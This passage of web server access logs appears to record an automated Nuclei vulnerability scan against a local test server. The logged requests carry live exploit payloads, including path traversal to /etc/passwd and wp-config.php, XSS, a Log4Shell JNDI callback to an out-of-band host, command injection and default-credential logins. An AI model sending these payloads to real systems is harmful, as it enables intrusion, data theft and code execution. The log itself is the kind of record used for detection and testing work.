"http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /aws.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"\x0D\x0A\x0D\x0A generate_script\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A {{profile}}\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A /etc/passwd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cobbler_api HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login_page.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"j_username=${jndi:ldap://${hostName}.ca2tuc8smpv1g2s80ca06e6ydmpkoia76.oast.pro}&j_password=password&logincontext=employee","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"http://127.0.0.1/mifs/user/login.jsp", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=action_name HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=elex-product-feed-manage&search=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/42 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?piereg_logout_url=true&redirect_to=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/neo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm_tiles/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/settings/values HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CACHE/sdesktop/install/start.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/43 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /enginemanager/ftu/welcome.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/v1/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"return=index.php&username=administrator&password=root","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /menu/stc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sql.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/29N5EfMdnCifsfjSeWzcDDZhejS/);marmoset.embed(%27a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json/v1.0/29N5EgKLllFRgIVHZIBuwh9i0Nw@interact.sh?Protocol=Autodiscoverv1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /community/?foro=signin&redirect_to=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/redirection/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /include/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/44 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client_secrets.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"aps=ca2tuc8smpv1g2s80ca0cjjn5y9dhhpim.oast.pro&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /AdminTools/querybuilder/logon?framework= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/add-on/business-continuity/api/cipher.aes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:06 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} 